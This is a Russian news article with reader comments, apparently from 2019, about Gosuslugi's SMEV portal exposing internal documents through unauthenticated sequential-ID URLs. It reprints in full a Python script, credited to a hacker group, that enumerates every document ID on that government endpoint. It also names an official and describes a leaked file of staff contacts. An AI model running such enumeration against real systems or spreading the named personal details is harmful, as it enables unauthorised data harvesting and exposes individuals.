Оказалось, что внутренние документы чиновников с их персональной информацией открыты для свободного доступа. «Абсолютно _ВСЯ_ база рабочих документов, касающихся интеграции лежит в открытом доступе, — пишет Литреев. — Она никак не зашифрована, не имеет никакой авторизации/аутентификации и, в принципе, скачать её может абсолютно кто угодно».
Посмотреть любой документ в базе можно по прямой ссылке такого вида:
http://smev.gosuslugi.ru/portal/api/files/get/XXXXXгде XXXXX — порядковый номер документа в системе.
Например, по запросу /files/get/10484 скачивается таблица Excel под названием МВ ответственные.xlsx, в которой содержится информация обо всех лицах, ответственных за интеграцию. В списке указаны ФИО, должность, служебные и личные мобильные телефоны, адрес электронной почты для связи по вопросам интеграции.
Александр Литреев напоминает, что на разработку портала «Госуслуги» было потрачено более 495 миллионов рублей. Ресурс позиционируется как централизованный сервис взаимодействия с различными государственными службами и органами — с помощью него можно оформить паспорт/загранпаспорт, водительское удостоверение, получить справку об отсутствии судимости и многое другое. По данным Минкомсвязи, по состоянию на апрель 2019 года на портале были зарегистрированы 86,5 млн россиян.
К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие.
Для интеграции данных из разных источников на портале организована Система Межведомственного Электронного Взаимодействия (СМЭВ), через которую подключаются все региональные и федеральные органы. Именно эта часть портала не защищена. Прямо сейчас документы с портала http://smev.gosuslugi.ru/ находятся в открытом доступе.
«Естественно, не составляет никакого труда написать скрипт, который обеспечит перебор всех таких адресов и выгрузит все такие документы, что уже успели сделать энтузиасты из одного соседнего государства», — пишет Литреев.
Хакерская группа THack3forU выложила на Github питоновский скрипт для поиска валидных URL с документами.
В общем-то, скрипт довольно простой:
import urllib.request
from urllib.error import URLError, HTTPError
a=1
s=[]
code=0
b=range(1, 999999)
for a in b:
if a <= 9:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00000",a.__str__())))
elif a <= 99:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0000",a.__str__())))
elif a <= 999:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/000",a.__str__())))
elif a <= 9999:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00",a.__str__())))
elif a <= 99999:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0",a.__str__())))
elif a <= 999999:
s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/",a.__str__())))
for i in range(len(s)):
try:
sitecode=urllib.request.urlopen(s[i]).getcode()
if sitecode == 200:
print(s[i],"Nice Url!")
f = open('good.txt', 'a')
f.write(s[i] + '\n')
f.close()
except urllib.error.HTTPError as e:
if e.code == 500:
print(s[i],"Invalid Url!")
else:
print(s[i],"Error:",e.code)Файлы доступны и в поиске Google.
Александр Литреев просмотрел некоторые документы в базе и нашёл несколько любопытных деталей. Например, руководитель подразделения межведомственного взаимодействия ФСБ Мелин Александр Васильевич использует личную почту на Mail.ru.
Комментарии (35)
Akatyi
23.05.2019 19:47+5Никогда такого не было, и вот опять…
А вообще грустно от этого.
user343
23.05.2019 20:51«Большинство pоссийских систем автоматизации-это полные вилы =(»
© 2005 [Moderator of Ru.1CSoft] [LESHY-RIPN]
Так что ударим нашим собственным Викиликсом по бездорожью и разгильдяйству.
alexdoesh
23.05.2019 22:56+1Ой, все, такие же вилы по всему миру. Кто щупал американский QuickBooks, к примеру, тот поймет.
Enmar
23.05.2019 19:58+2Эх.
Сайт выключили.
Обидно.
Столько интересной инфы пропало.
Может кто-нибудь успел написать скрипт?
abar
23.05.2019 20:23-5Открытая техническая документация (доступная тут: smev3.gosuslugi.ru/portal) на государственном портале находится в открытом доступе. «Хакеры» делятся скриптами для загрузки открытых документов и теперь будут гордо изучать документацию к системе. На техническом ресурсе Хабр это подают как сенсацию и в комментариях обсуждают как «в этой стране» всё плохо.
Ну да, в интернете всё как обычно.
Единственное, что «не так» — в оригинальной статье нашли список емеилов ответственных лиц, и некоторые пользуются личными, а не корпоративными адресами с меил ру. Это действительно прокол, который, надеюсь, исправят.AC130
23.05.2019 21:28+2Т.е. проще говоря, все эти документы и подразумевались как доступные для скачивания всем желающим?
multiadmin
23.05.2019 21:31+2Единственное, что «не так» — в оригинальной статье нашли список емеилов ответственных лиц, и некоторые пользуются личными, а не корпоративными адресами с меил ру.
Это точно.
Я понимаю, если бы нашли документ, подтверждающий, что вся команда Хабра работает на ФСБ, а Ализар вообще двойной агент. Вот это было бы интересно!
willyd
23.05.2019 20:38+5А format отменили?
if a <= 9: s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00000",a.__str__()))) elif a <= 99: s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0000",a.__str__())))andvary
23.05.2019 22:43+2opensource как профдеформация :)
Увидел код, на автомате пофиксил баги, оптимизировал пару функций.
saipr
23.05.2019 21:15-1Я не знаю как насчет внутренних документов, но портал Госуслуг это наверное у нас единственный портал, на который можно попасть в личный кабинет из любой операционной системы с авторизацией на сертификатвх при условии хранения сертификата и его закрытого ключа на токенах PKCS#11 с поддержкой российской криптографии.
so1ov
23.05.2019 21:26+3По данным Минкомсвязи, по состоянию на апрель 2019 года на портале были зарегистрированы 86,5 млн россиян.
Довольно жизнеутверждающее число, при том что в России навскидку живет около 140 миллионов человек, не все из которых имеют российское гражданство.
Ну а про заветы китайского программирования на Python выше уже высказались.Pilat
24.05.2019 02:40Ну я например два раза зарегистрирован. Один раз с ошибочными данными, но удалить дубликат очень непросто оказалось.
knowy
24.05.2019 04:21Если перефразировать как «86.5 млн учетных записей», то вполне верю. Работников госучреждений там регистрировали в добровольно-принудительном порядке (а таковых у нас очень много), многим людям пришлось создавать вторую учетку, т.к. поначалу не все сотрудники МФЦ умели подтверждать личность, не регистрируя для этого человека заново. Да и вообще, 30% скидка на почти все пошлины и возможность записаться на прием к врачу, например, заставили меня зарегистрировать там своего отца, которому уже 70+ и в целом ему «этот ваш интернет… не нужон»
DrZlodberg
24.05.2019 09:05Подозреваю, что многие там оказались вынужденно. Наше государство привыкло действовать методами «а кто не купит — отключим газ». Например я там зареган исключительно потому, что когда получал права необходимо было записаться на экзамен исключительно через ГО. Почему это не могла сделать сама школа, при том, что она всё равно подаёт все документы сама — вопрос. На получение самой карточки записаться без ГО тоже было невозможно.
Т.е. реально нафиг мне он не сдался, но в статистике — я счастливый пользователь.
Кстати когда получал предыдущие права — такая же хрень была с PGU, и там я тоже радую статистику, а по факту…multiadmin
24.05.2019 09:14Т.е. реально нафиг мне он не сдался
Что-то вы с того конца проблемы зашли. Надо было начинать: «государство заставило меня права получать, которые мне нафиг не нужны, я и так ездить умею».DrZlodberg
24.05.2019 10:16Неудачный пример. Необходимость прав вполне очевидна любому, кто близко подходил к автомобильной дороге. А вот какова во всём этом необходимость ГО кроме пункта «натянуть статистику»? Хотя понимаю, для некоторых это тоже очень важная вещь.
multiadmin
24.05.2019 10:18Необходимость иметь сайт госуслуг тоже вполне очевидна любому, кто хотя бы раз стоял в очереди на сдачу документов, получение справок и т.д.
DrZlodberg
24.05.2019 10:32Вы не слишком внимательно читали мой комментарий.
1. Я нигде не отрицал его необходимость.
2. Речь была про то, что статистика не соответсвует реальным потребностям в нём, т.к. некоторых (уже упомянуты госслужащие, например) туда загоняют насильно.
3. Проблема очередей сейчас неплохо решается электронной очередью, в которою сюрприз-сюрприз иногда невозможно попасть иначе, чем через ГО. Хотя есть терминалы, но они выдают пяток квитков в день. Конкретно мой случай — при попытке получить бумажку в терминале было сказано, что автомат выдаёт 7 (семь!) штук в день. Ага, на очередь минимум человек 40.multiadmin
24.05.2019 11:48что статистика не соответсвует реальным потребностям
Статистика даже преуменьшает реальные потребности, потому что 100% населения рано или поздно начинает использовать государственные услуги.
То, что часть людей из-за лени, по каким-то идеологическим, параноидальным, религиозным и другим причинам не хочет пользоваться цифровизацией — это проблема для государства.
Потому что чем больше людей пользуется электронными услугами, тем быстрее решаются дела, меньше накладные расходы, больше потребности в квалифицированных кадрах, более точная статистика и прочее, прочее, прочее…
Чем дальше человек будет отстранен от функционирования гос-системы, тем меньше коррупции и злоупотреблений будет, и тем больше будет справедливости в мире. А ушлые товарищи используют терминалы электронной очереди, что бы нахватать тикетов, а потом перепродать место в очереди.
И в заключение. Чем раньше общество начнет пользоваться электронными услугами, тем быстрее система пройдет этапы эволюции и развития, и тем быстрее мы получим максимально беспроблемную систему. Система, которой не пользуются — не развивается и не совершенствуется.
Поэтому, я полностью поддерживаю «принудительное» привлечение населения к использованию госуслуг.
ConstSe
23.05.2019 23:06руководитель подразделения межведомственного взаимодействия ФСБ Мелин Александр Васильевич использует личную почту на Mail.ru.
А почему бы ему не иметь почту на серверах «дочерней структуры»? Ему же не надо опасаться, что товарищ майор прочитает.
MacIn
23.05.2019 23:24+1А почему в приведенном в конце документе есть данные по ФМС? ФМС переформировали/переформатировали/переименовали в ОВМ МВД уже несколько лет назад. Это устаревшие данные?
Spellinger
24.05.2019 00:26Да это мусор. Ценности не представляет.
Хотя сам факт наличия подобной дыры говорит о «профессионалах», которые этим занимаются.
Tachyon
24.05.2019 06:41Дыра на портале «Госуслуги»: внутренние документы лежат в открытом доступе
Очередная среди многих.
И на фоне всего этого так весело выглядят заманухи для народа по регистрации на госуслугах — вот вам скидка на пошлины, через госуслуги и тд и тп. ХРЕН вам! Я лучше заплачу больше пошлину, чем солью свои документы ещё раз (глядя как относятся к личной информации в государстве в целом, понимаю что уже всё слито неоднократно).
Например, по запросу /files/get/10484 скачивается таблица Excel под названием МВ ответственные.xlsx, в которой содержится информация обо всех лицах, ответственных за интеграцию.
Они хорошо интегрировали свои данные по многим местам в сети, о которых и сами не знают.
Александр Литреев напоминает, что на разработку портала «Госуслуги» было потрачено более 495 миллионов рублей.
Я и за меньшую сумму могу все документы на открытый файлообменник выложить. Поэтому считаю что кто-то просто хорошо нажился на всём этом.
Судя по ситуации фразу ''К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие.'' надо читать как ''К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие, произвольные никому неизвестные люди''
sneka
24.05.2019 13:23Ничего, что на ВСЕ эти документы есть ссылка на главной странице smev.gosuslugi.ru?
shalm
Вообщем-то система так и работает, как должна, все кто мог сделать лучше уехали.
yearslater
Из какой страны пишете?